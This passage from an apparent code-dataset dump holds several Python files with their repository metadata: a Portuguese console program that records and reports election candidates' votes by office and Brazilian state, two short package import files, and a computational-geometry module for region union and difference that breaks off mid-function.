###----------------------------------###
#################################################################
elif opcao_cons == '3':
print '\nRelação de votos por Cargo e Região\n'
texto = ' -- |COD_CANDIDATO|NOME |NUM_VOTOS|'
agrupa_regiao = []
agrupa_cargo = []
regiao_votos = []
cargo_votos = []
i=0
j=0
k=0
l=0
m=0
for i in range(len(cargo)):
if cargo[i] not in agrupa_cargo:
#print str(cargo[i]) + '| ' + str(num_votos[i])
cargo_votos.append(int(num_votos[i]))
agrupa_cargo.append(str(cargo[i]))
else:
index = agrupa_cargo.index(str(cargo[i]))
cargo_votos[index] = int(num_votos[i])+ int(cargo_votos[index])
for j in range(len(regiao)):
if regiao[j] not in agrupa_regiao and cargo[j] in agrupa_cargo:
#print str(regiao[i]) + '| ' + str(num_votos[i])
regiao_votos.append(int(num_votos[j]))
agrupa_regiao.append(str(regiao[j]))
else:
index = agrupa_regiao.index(str(regiao[j]))
regiao_votos[index] = int(num_votos[j])+ int(regiao_votos[index])
for k in range(len(agrupa_cargo)):
ver_reg = []
print '-'.ljust(60, '-')
print '\nCARGO - '+ str(agrupa_cargo[k]).ljust(10, ' ')
for l in range(len(agrupa_regiao)):
for m in range(len(nome)):
#print imp
if (cargo[m] == agrupa_cargo[k]) and (regiao[m] == agrupa_regiao[l]):
if regiao[m] not in ver_reg:
if int(agrupa_regiao[l]) == 1:
estado = '01-Acre - AC'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 2:
estado = '02- Alagoas - AL'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 3:
estado = '03- Amapá - AP'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 4:
estado = '04- Amazonas - AM'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 5:
estado = '05- Bahia - BA'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 6:
estado = '06- Ceará - CE'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 7:
estado = '07- Distrito Federal - DF'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 8:
estado = '08- Espírito Santo - ES'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 9:
estado = '09- Goiás - GO'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 10:
estado = '10- Maranhão - MA'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 11:
estado = '11- Mato Grosso - MT'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 12:
estado = '12- Mato Grosso do Sul - MS'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 13:
estado = '13- Minas Gerais - MG'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 14:
estado = '14- Pará - PA'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 15:
estado = '15- Paraíba - PB'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 16:
estado = '16- Paraná - PR'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 17:
estado = '17- Pernambuco - PE'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 18:
estado = '18- Piauí - PI'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 19:
estado = '19- Roraima - RR'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 20:
estado = '20- Rondônia - RO'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 21:
estado = '21- Rio de Janeiro - RJ'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 22:
estado = '22- Rio Grande do Norte - RN'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 23:
estado = '23- Rio Grande do Sul - RS'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 24:
estado = '24- Santa Catarina - SC'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 25:
estado = '25- São Paulo - SP'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 26:
estado = '26- Sergipe - SE'
print '\n- REGIAO - ' + estado
print texto
elif int(agrupa_regiao[l]) == 27:
estado = '27- Tocantins - TO'
print '\n- REGIAO - ' + estado
print texto
if (cargo[m] == agrupa_cargo[k]) and (regiao[m] == agrupa_regiao[l]):
print ' -- |' + str(cod_candidato[m]).ljust(13,' ') +'|' + str(nome[m]).ljust(25, ' ') + '|' + str(num_votos[m]).ljust(9,' ') + '|'
ver_reg.append(regiao[m])
###---- CHAMA SUBMENU DE OPÇÕES ----###
submenu_opt = raw_input('\nDigite uma das opções abaixo para continuar:\n'
'1- Voltar para consulta\n'
'2- Voltar para menu inicial\n'
'3- Sair do programa\n')
if int(submenu_opt) == 1:
return consultas()
elif int(submenu_opt) == 2:
return menu_inicial()
else:
exit()
###----------------------------------###
#################################################################
elif opcao_cons == '4':
print '\nRelação de votos por Região\n'
texto = ' -- |COD_CANDIDATO|NOME |CARGO |NUM_VOTOS|'
agrupa_regiao = []
regiao_votos = []
j=0
k=0
l=0
m=0
for j in range(len(regiao)):
if regiao[j] not in agrupa_regiao:
regiao_votos.append(int(num_votos[j]))
agrupa_regiao.append(str(regiao[j]))
else:
index = agrupa_regiao.index(str(regiao[j]))
regiao_votos[index] = int(num_votos[j])+ int(regiao_votos[index])
for l in range(len(agrupa_regiao)):
ver_reg = []
for m in range(len(nome)):
if (regiao[m] == agrupa_regiao[l]):
if regiao[m] not in ver_reg:
if int(agrupa_regiao[l]) == 1:
estado = '01-Acre - AC'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 2:
estado = '02- Alagoas - AL'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 3:
estado = '03- Amapá - AP'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 4:
estado = '04- Amazonas - AM'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 5:
estado = '05- Bahia - BA'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 6:
estado = '06- Ceará - CE'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 7:
estado = '07- Distrito Federal - DF'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 8:
estado = '08- Espírito Santo - ES'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 9:
estado = '09- Goiás - GO'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 10:
estado = '10- Maranhão - MA'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 11:
estado = '11- Mato Grosso - MT'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 12:
estado = '12- Mato Grosso do Sul - MS'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 13:
estado = '13- Minas Gerais - MG'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 14:
estado = '14- Pará - PA'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 15:
estado = '15- Paraíba - PB'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 16:
estado = '16- Paraná - PR'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 17:
estado = '17- Pernambuco - PE'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 18:
estado = '18- Piauí - PI'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 19:
estado = '19- Roraima - RR'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 20:
estado = '20- Rondônia - RO'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 21:
estado = '21- Rio de Janeiro - RJ'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 22:
estado = '22- Rio Grande do Norte - RN'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 23:
estado = '23- Rio Grande do Sul - RS'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 24:
estado = '24- Santa Catarina - SC'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 25:
estado = '25- São Paulo - SP'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 26:
estado = '26- Sergipe - SE'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
elif int(agrupa_regiao[l]) == 27:
estado = '27- Tocantins - TO'
print '-'.ljust(80, '-')
print '\n- REGIAO - ' + estado + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
print texto
if (regiao[m] == agrupa_regiao[l]):
print ' -- |' + str(cod_candidato[m]).ljust(13,' ') +'|' + str(nome[m]).ljust(25, ' ') + '|' + str(cargo[m]).ljust(25,' ') + '|' + str(num_votos[m]).ljust(9,' ') + '|'
ver_reg.append(regiao[m])
###---- CHAMA SUBMENU DE OPÇÕES ----###
submenu_opt = raw_input('\nDigite uma das opções abaixo para continuar:\n'
'1- Voltar para consulta\n'
'2- Voltar para menu inicial\n'
'3- Sair do programa\n')
if int(submenu_opt) == 1:
return consultas()
elif int(submenu_opt) == 2:
return menu_inicial()
else:
exit()
###----------------------------------###
#################################################################
elif opcao_cons == 5:
exit()
########################################################################################################################
# Definindo funcao para cadastrar dados no arquivo binario
def cadastrar_dados():
nom_arq = raw_input("Digite o nome do arquivo:\n")
try:
arquivo = open("C:/Trab_Rennan/"+nom_arq+".dat","ab")
except:
print("Erro ao abrir arquivo "+nom_arq+".dat\n")
raw_input("Pressione <Enter> para sair...")
exit()
controle=1
while (controle >0):
cod_candidato = raw_input("\nDigite o código do candidato:")
nome = raw_input("\nDigite o nome do candidato:")
print '\nSelecione o cargo do candidato:\n1-Governador\n2-Prefeito\n3-Deputado Estadual\n4-Vereador'
cargo = raw_input("\nCargo:")
print 'Código de Região:\n'
print '01- Acre – AC 10- Maranhão – MA 19- Roraima – RR\n02- Alagoas – AL 11- Mato Grosso – MT 20- Rondônia – RO\n03- Amapá – AP 12- Mato Grosso do Sul – MS 21- Rio de Janeiro – RJ\n04- Amazonas – AM 13- Minas Gerais – MG 22- Rio Grande do Norte – RN\n05- Bahia – BA 14- Pará – PA 23- Rio Grande do Sul – RS\n06- Ceará – CE 15- Paraíba – PB 24- Santa Catarina – SC\n07- Distrito Federal – DF 16- Paraná – PR 25- São Paulo – SP\n08- Espírito Santo – ES 17- Pernambuco – PE 26- Sergipe – SE\n09- Goiás – GO 18- Piauí – PI 27- Tocantins – TO\n'
regiao = raw_input("\nDigite o código da região do candidato:")
num_votos = raw_input("\nDigite a quantidade de votos do candidato:")
if str(cargo) == '1':
cod_cargo = 'Governador'
elif str(cargo) == '2':
cod_cargo = 'Prefeito'
elif str(cargo) == '3':
cod_cargo = 'Deputado Estadual'
elif str(cargo) == '4':
cod_cargo = 'Vereador'
dados = [cod_candidato,nome,cod_cargo,regiao,num_votos]
#print(dados)
conf_dados =raw_input("Confirma dados? (S/N)\n")
if conf_dados.upper() == "S":
pickle.dump(cod_candidato,arquivo)
pickle.dump(nome.upper(),arquivo)
pickle.dump(cod_cargo.upper(),arquivo)
pickle.dump(regiao,arquivo)
pickle.dump(num_votos,arquivo)
print "Dados gravados com sucesso!\n"
conf_dados = raw_input("Cadastrar novos dados? (S/N)\n")
if conf_dados.upper() == "S":
controle = 1
else:
arquivo.close()
controle = controle - 1
else:
conf_dados = raw_input("Cadastrar novos dados? (S/N)\n")
if conf_dados.upper() == "S":
controle = 1
else:
arquivo.close()
controle = controle - 1
return menu_inicial()
########################################################################################################
# Criando Menu Inicial de Opcoes
def menu_inicial():
menu_principal = raw_input("\nSelecione uma das opções abaixo:\n"
"1- Cadastrar dados de candidatos\n"
"2- Consultar dados de candidatos\n"
"3- Sair do programa\n")
if int(menu_principal) == 1:
return cadastrar_dados()
elif int(menu_principal) == 2:
return consultas()
else:
exit()
########################################################################################################
####------ INICIANDO PROGRAMA -------####
menu_inicial()
| 48.889894 | 627 | 0.379527 | 3,036 | 32,414 | 3.984519 | 0.090909 | 0.063073 | 0.06233 | 0.071423 | 0.804166 | 0.765148 | 0.744234 | 0.736381 | 0.734562 | 0.724642 | 0 | 0.035899 | 0.468902 | 32,414 | 662 | 628 | 48.963746 | 0.665176 | 0.033658 | 0 | 0.829787 | 0 | 0.003546 | 0.195282 | 0.001629 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.001773 | null | null | 0.271277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9337fbb5c8b262173f3357bcde1c8f4d68a5d5b4 | 232 | py | Python | bitmovin_api_sdk/notifications/emails/usage_reports/__init__.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | [
"MIT"
] | 11 | 2019-07-03T10:41:16.000Z | 2022-02-25T21:48:06.000Z | bitmovin_api_sdk/notifications/emails/usage_reports/__init__.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | [
"MIT"
] | 8 | 2019-11-23T00:01:25.000Z | 2021-04-29T12:30:31.000Z | bitmovin_api_sdk/notifications/emails/usage_reports/__init__.py | jaythecaesarean/bitmovin-api-sdk-python | 48166511fcb9082041c552ace55a9b66cc59b794 | [
"MIT"
] | 13 | 2020-01-02T14:58:18.000Z | 2022-03-26T12:10:30.000Z | from bitmovin_api_sdk.notifications.emails.usage_reports.usage_reports_api import UsageReportsApi
from bitmovin_api_sdk.notifications.emails.usage_reports.email_notification_list_query_params import EmailNotificationListQueryParams
| 77.333333 | 133 | 0.931034 | 28 | 232 | 7.285714 | 0.571429 | 0.176471 | 0.147059 | 0.176471 | 0.480392 | 0.480392 | 0.480392 | 0.480392 | 0 | 0 | 0 | 0 | 0.034483 | 232 | 2 | 134 | 116 | 0.910714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9339aeccdd81814d4bb06794810cba712a4e817f | 109 | py | Python | stable_baselines3/pdqn/__init__.py | martinwimpff/stable-baselines3-hmlf | 6ffa947760f8c42a09f9ae42aa7485c608efc42d | [
"MIT"
] | null | null | null | stable_baselines3/pdqn/__init__.py | martinwimpff/stable-baselines3-hmlf | 6ffa947760f8c42a09f9ae42aa7485c608efc42d | [
"MIT"
] | null | null | null | stable_baselines3/pdqn/__init__.py | martinwimpff/stable-baselines3-hmlf | 6ffa947760f8c42a09f9ae42aa7485c608efc42d | [
"MIT"
] | null | null | null | from stable_baselines3.pdqn.pdqn import PDQN
from stable_baselines3.pdqn.policies import CnnPolicy, MlpPolicy | 54.5 | 64 | 0.880734 | 15 | 109 | 6.266667 | 0.533333 | 0.212766 | 0.425532 | 0.510638 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019802 | 0.073395 | 109 | 2 | 64 | 54.5 | 0.910891 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
93487dc4a61061e02b664b729218bc78abd08415 | 15,337 | py | Python | CS 495 - Spatiotemporal Databases (IS)/raincloudcollector/interpolate/region.py | kevin-411/SIUE-Projects | 92f386abc1b44762d6b146a71a393447234d6cf2 | [
"MIT"
] | 1 | 2021-02-11T09:14:28.000Z | 2021-02-11T09:14:28.000Z | CS 495 - Spatiotemporal Databases (IS)/raincloudcollector/region.py | kevin-411/SIUE-Projects | 92f386abc1b44762d6b146a71a393447234d6cf2 | [
"MIT"
] | null | null | null | CS 495 - Spatiotemporal Databases (IS)/raincloudcollector/region.py | kevin-411/SIUE-Projects | 92f386abc1b44762d6b146a71a393447234d6cf2 | [
"MIT"
] | null | null | null | import segLibrary
import hsegLibrary
import struct
def getRandomIntegerRegion( numRandomSegsToGenerate = 50, percentOfSegsToRemove = .05 ):
'''
generates a region from random segments.
input:
numRandomSegsToGenerate: the number of random segs to generate. The actual region
will have many fewer segs than this. Higher numbers will typically generate more complex regions.
The region will be constructed by intersecting the reandom segs, and finding a region
among the resulting segs.
percentOfSegsToRemove: Once random segments are generated and intersected such that all
segments only intersect at endpoints, some segments will be removed at random.
This parameter indicates the percentage of overall segs that will be removed. A
higher number typically causes regions to have less regular shapes. Note that a high percentage
may require a larger number of random segs to be generated.
returns:
hsegs: an ordered list of half segments with valid labels.
A half segment is a tuple with the following:
((x,y)(x,y), labelAbove, labelBelow)
labels are integral values
an interior label will be positive. An exterior label will be -1
hsegs will be ordered in half segment order
Each cycle in hsegs will have its own unique label number
'''
if numRandomSegsToGenerate == None:
numRandomSegsToGenerate = 50
if percentOfSegsToRemove == None:
percentOfSegsToRemove = .05
#random.seed()
# got a bunch of random segs with integer endpoints
segs = segLibrary.createRandomSegs( numRandomSegsToGenerate )
# find their intersections, but make sure endpoints are integers
segs = segLibrary.calcNonIntersectingSegsIntEndPoints(segs)
#randomly remove some of the segs
segs = segLibrary.removeRandSegs( segs, percentOfSegsToRemove )
# create a region, favoring large (as in... containing lots of segments) cycles
hsegs = hsegLibrary.extractAllLargeValidCycles( segs )
return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
def getRandomRegion( numRandomSegsToGenerate = 50, percentOfSegsToRemove = .05 ):
'''
generates a region from random segments.
input:
numRandomSegsToGenerate: the number of random segs to generate. The actual region
will have many fewer segs than this. Higher numbers will typically generate more complex regions.
The region will be constructed by intersecting the reandom segs, and finding a region
among the resulting segs.
percentOfSegsToRemove: Once random segments are generated and intersected such that all
segments only intersect at endpoints, some segments will be removed at random.
This parameter indicates the percentage of overall segs that will be removed. A
higher number typically causes regions to have less regular shapes. Note that a high percentage
may require a larger number of random segs to be generated.
returns:
hsegs: an ordered list of half segments with valid labels.
A half segment is a tuple with the following:
((x,y)(x,y), labelAbove, labelBelow)
labels are integral values
an interior label will be positive. An exterior label will be -1
hsegs will be ordered in half segment order
Each cycle in hsegs will have its own unique label number
'''
if numRandomSegsToGenerate == None:
numRandomSegsToGenerate = 50
if percentOfSegsToRemove == None:
percentOfSegsToRemove = .05
#random.seed()
# got a bunch of random segs with integer endpoints
segs = segLibrary.createRandomSegs( numRandomSegsToGenerate )
# convert to floats
segs = [((float(s[0][0]),float(s[0][1])), (float(s[1][0]), float(s[1][1])) ) for s in segs]
newSegs = []
for s in segs:
if s[0] < s[1]:
newSegs.append( s )
else:
newSegs.append( (s[1],s[0]) )
segs = newSegs
# find their intersections
segs = segLibrary.calcNonIntersectingSegs(segs)
#randomly remove some of the segs
segs = segLibrary.removeRandSegs( segs, percentOfSegsToRemove )
# create a region, favoring large (as in... containing lots of segments) cycles
hsegs = hsegLibrary.extractAllLargeValidCycles( segs )
return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
def createRegionFromSegs( segs ):
if segs == None or len(segs) == 0:
return []
segs = [((float(s[0][0]),float(s[0][1])), (float(s[1][0]), float(s[1][1])) ) for s in segs]
newSegs = []
for s in segs:
if s[0] < s[1]:
newSegs.append( s )
else:
newSegs.append( (s[1],s[0]) )
segs = newSegs
segs = segLibrary.calcNonIntersectingSegs( segs )
hsegs = hsegLibrary.labelUniqueCycles( segs )
return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
def createRegionFavorLargeCyclesFromSegs( segs ):
if segs == None or len(segs) == 0:
return []
newSegs = [];
for s in segs:
if segLibrary.poiComp( s[0], s[1] ) == 1:
s = (s[1], s[0] )
if( s[0] != s[1] ):
newSegs.append( s )
segs = newSegs
segs = segLibrary.calcNonIntersectingSegs( segs )
return hsegLibrary.extractAllLargeValidCycles( segs )
def getOuterCycle( hsegs ):
if hsegs == None or len(hsegs) == 0:
return []
return giveUniqueLabelToEachCycle( hsegs, True )
def giveUniqueLabelToEachCycle( hsegs, getOnlyOuterCycle = False ):
if hsegs == None or len(hsegs) == 0:
return []
segs = [h[0] for h in hsegs if hsegLibrary.isLeft( h ) ]
hsegs = hsegLibrary.labelUniqueCycles( segs, getOnlyOuterCycle )
return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
def createCountPartition( segList, laList, lbList ):
if segList == None or laList == None or lbList == None or len( segList )== 0 or len( laList ) == 0 or len( lbList ) == 0 or len(segList) != len( laList ) or len( segList ) != len( lbList ) or len( laList) != len( lbList ):
return [],[],[]
sr,la,lb = segLibrary.calcNonIntersectingSegs( segList, laList, lbList )
# write the results to a file
outfile = open( 'zcountIntermediateNon_Rob_Check.txt','w' )
for i in range( len( sr ) ):
seg = sr[i]
s=struct.pack('>d', seg[0][0] )
hexx1 = ''.join('%.2x' % ord(c) for c in s) # get hex vals from bin string s
s=struct.pack('>d', seg[0][1])
hexy1 = ''.join('%.2x' % ord(c) for c in s) # get hex vals from bin string s
s=struct.pack('>d', seg[1][0])
hexx2 = ''.join('%.2x' % ord(c) for c in s) # get hex vals from bin string s
s=struct.pack('>d', seg[1][1])
hexy2 = ''.join('%.2x' % ord(c) for c in s) # get hex vals from bin string s
#output the line to the new file
outfile.write( hexx1 + ' ' + hexy1 + ' '+ hexx2 + ' ' + hexy2+' ' + str(la[i]) +' '+str(lb[i])+ '\n')
outfile.close()
print zip( sr, la, lb)
print 'done intersections'
s,la,lb = segLibrary.countInteriors( sr, la, lb)
return s,la,lb
def union( hsegs1, hsegs2 ):
''' Assumes that hsegs1 and hsegs2 are valid regions, created with def createRegionFromSegs.
regions are assumed to have valid labelling. This function will relabel them to compute the union
'''
if hsegs1 == None:
hsegs1 = list()
if hsegs2 == None:
hsegs2 == list()
if len( hsegs1 ) == 0:
return hsegs2
if len( hsegs2 ) == 0:
return hsegs1
if len(hsegs1) == 0 and len( hsegs2) == 0:
return []
# get the segs
segs1 = [ h[0] for h in hsegs1 if hsegLibrary.isLeft( h ) ]
segs2 = [ h[0] for h in hsegs2 if hsegLibrary.isLeft( h ) ]
# get the bboxs
s1maxx = max( [x[0] for y in segs1 for x in y] )
s1minx = min( [x[0] for y in segs1 for x in y] )
s1maxy = max( [x[1] for y in segs1 for x in y] )
s1miny = min( [x[1] for y in segs1 for x in y] )
s2maxx = max( [x[0] for y in segs2 for x in y] )
s2minx = min( [x[0] for y in segs2 for x in y] )
s2maxy = max( [x[1] for y in segs2 for x in y] )
s2miny = min( [x[1] for y in segs2 for x in y] )
# check for overlap in x AND y direction
if not( (s1maxx >= s2maxx and s1minx >= s2maxx) or ( s1maxx <= s2minx and s1minx <= s2minx) or (s1maxy >= s2maxy and s1miny >= s2maxy) or ( s1maxy <= s2miny and s1miny <= s2miny)):
# get the broken segs
resultSegs1, resultSegs2 = segLibrary.segIntersection( segs1, segs2 )
# get the regions
hsegs1 = hsegLibrary.labelUniqueCycles( resultSegs1 )
hsegs1 = hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs1 )
hsegs2 = hsegLibrary.labelUniqueCycles( resultSegs2 )
hsegs2 = hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs2 )
# keep just the left hsegs
hsegs1 = [h for h in hsegs1 if hsegLibrary.isLeft( h ) ]
hsegs2 = [h for h in hsegs2 if hsegLibrary.isLeft( h ) ]
# union will keep all hsegs out of the other or on with matching interabove
s1, la1, lb1 = [ list(z) for z in zip(* hsegs1 )]
s2, la2, lb2 = [ list(z) for z in zip(* hsegs2 )]
# keep the ones out of the opposing region
resultSet = set();
resultSet |= segLibrary.keepOuterBoundary( s1, la1, lb1, s2, la2, lb2 )
resultSet |= segLibrary.keepOuterBoundary( s2, la2, lb2, s1, la1, lb1 )
# make a region out of it
resultList = list( resultSet )
hsegs = hsegLibrary.labelUniqueCycles( resultList )
return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
else:
resultList = list()
for s in segs1:
resultList.append( s );
for s in segs2:
resultList.append( s )
resultSet = set( resultList )
resultList = list( resultSet )
# create the region this code copied from createRegionFromsegs, minus the seg intersection function call
hsegs = hsegLibrary.labelUniqueCycles( resultList )
return hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs )
def difference( hsegs1, hsegs2 ):
''' NON-symmetric difference. for R1 and R2,
defined as R1 - (R1 \cap R2).
Regions are asssumed to have valid labelling.
this fucntion will return a properly labeled region
'''
if hsegs1 == None or len(hsegs1) == 0:
return []
if hsegs2 == None or len(hsegs2) == 0:
return hsegs1
# get the segs
segs1 = [ h[0] for h in hsegs1 if hsegLibrary.isLeft( h ) ]
segs2 = [ h[0] for h in hsegs2 if hsegLibrary.isLeft( h ) ]
# get the bboxs
s1maxx = max( [x[0] for y in segs1 for x in y] )
s1minx = min( [x[0] for y in segs1 for x in y] )
s1maxy = max( [x[1] for y in segs1 for x in y] )
s1miny = min( [x[1] for y in segs1 for x in y] )
s2maxx = max( [x[0] for y in segs2 for x in y] )
s2minx = min( [x[0] for y in segs2 for x in y] )
s2maxy = max( [x[1] for y in segs2 for x in y] )
s2miny = min( [x[1] for y in segs2 for x in y] )
# check for overlap in x AND y direction
if not( (s1maxx >= s2maxx and s1minx >= s2maxx) or ( s1maxx <= s2minx and s1minx <= s2minx) or (s1maxy >= s2maxy and s1miny >= s2maxy) or ( s1maxy <= s2miny and s1miny <= s2miny)):
# get the intersection
hsegsInter = intersection( hsegs1, hsegs2 )
if len( hsegsInter ) == 0:
return hsegs1
# now do the difference
# get the segs
segs1 = [ h[0] for h in hsegs1 if hsegLibrary.isLeft( h ) ]
segs2 = [ h[0] for h in hsegsInter if hsegLibrary.isLeft( h ) ]
# get the broken segs
resultSegs1, resultSegs2 = segLibrary.segIntersection( segs1, segs2 )
# get the regions
hsegs1 = hsegLibrary.labelUniqueCycles( resultSegs1 )
hsegs1 = hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs1 )
hsegs2 = hsegLibrary.labelUniqueCycles( resultSegs2 )
hsegs2 = hsegLibrary.switchLabelsForCorrectCycleLabelling( hsegs2 )
# keep just the left hsegs
hsegs1 = [h for h in hsegs1 if hsegLibrary.isLeft( h ) ]
hsegs2 = [h for h in hsegs2 if hsegLibrary.isLeft( h ) ]
# union will keep all hsegs out of the other or on with matching interabove
